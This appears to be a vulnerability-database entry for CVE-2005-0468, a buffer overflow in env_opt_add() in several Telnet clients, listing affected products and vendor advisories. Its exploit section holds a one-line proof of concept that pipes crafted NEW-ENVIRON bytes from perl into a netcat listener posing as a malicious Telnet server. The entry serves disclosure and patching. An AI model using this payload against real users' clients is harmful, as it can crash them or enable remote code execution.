Telnet Client env_opt_add() Buffer Overflow Vulnerability

Vulnerability ID: 1108586  Vulnerability Type: Buffer overflow
Published: 2005-03-28  Updated: 2007-02-22
CVE ID: CVE-2005-0468  CNNVD-ID: CNNVD-200505-503
Platform: Linux  CVSS Score: 7.5
|Vulnerability Source
https://www.exploit-db.com/exploits/25303
https://www.securityfocus.com/bid/12919
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-503
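|Vulnerability Details
TELNET is a network protocol that provides remote virtual terminal functionality, and many Telnet server and client implementations exist. Several Telnet client implementations contain a buffer overflow in their handling of the Telnet NEW-ENVIRON sub-negotiation option. If a user connects to a malicious Telnet server with a vulnerable client, malicious instructions may be executed on the client machine.
|Vulnerability EXP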
source: http://www.securityfocus.com/bid/12919/info

Multiple vendors' Telnet client applications are reported prone to a remote buffer-overflow vulnerability. This vulnerability reportedly occurs in the 'env_opt_add()' function in the 'telnet.c' source file, which is apparently common source for all the affected vendors.

A remote attacker may exploit this vulnerability to execute arbitrary code on some of the affected platforms in the context of a user that is using the vulnerable Telnet client to connect to a malicious server. 

perl -e 'print "\377", "\372\42\3\377\377\3\3" x 43, "\377\360"' | nc -l 23
|Affected Products
Ubuntu Ubuntu Linux 5.0 4 powerpc
Ubuntu Ubuntu Linux 5.0 4 i386
Ubuntu Ubuntu Linux 5.0 4 amd64
Trustix Secure Linux 2.2
Trustix Secure Linux 2.1
Trustix Secure Enterprise
|References

Source: US-CERT
Name: VU#341908
Link: http://www.kb.cert.org/vuls/id/341908
Source: REDHAT
Name: RHSA-2005:330
Link: http://www.redhat.com/support/errata/RHSA-2005-330.html
Source: REDHAT
Name: RHSA-2005:327
Link: http://www.redhat.com/support/errata/RHSA-2005-327.html
Source: DEBIAN
Name: DSA-703
Link: http://www.debian.org/security/2005/dsa-703
Source: web.mit.edu
Link: http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2005-001-telnet.txt
Source: SGI
Name: 20050405-01-P
Link: ftp://patches.sgi.com/support/free/security/advisories/20050405-01-P
Source: UBUNTU
Name: USN-224-1
Link: http://www.ubuntulinux.org/usn/usn-224-1
Source: BID
Name: 12919
Link: http://www.securityfocus.com/bid/12919
Source: IDEFENSE
Name: 20050328 Multiple Telnet Client env_opt_add() Buffer Overflow Vulnerability
Link: http://www.idefense.com/application/poi/display?id=221&type=vulnerabilities
Source: DEBIAN
Name: DSA-731
Link: http://www.debian.de/security/2005/dsa-731
Source: SUNALERT
Name: 57761
Link: http://sunsolve.sun.com/search/document.do?assetkey=1-26-57761-1
Source: SUNALERT
Name: 57755
Link: http://sunsolve.sun.com/search/document.do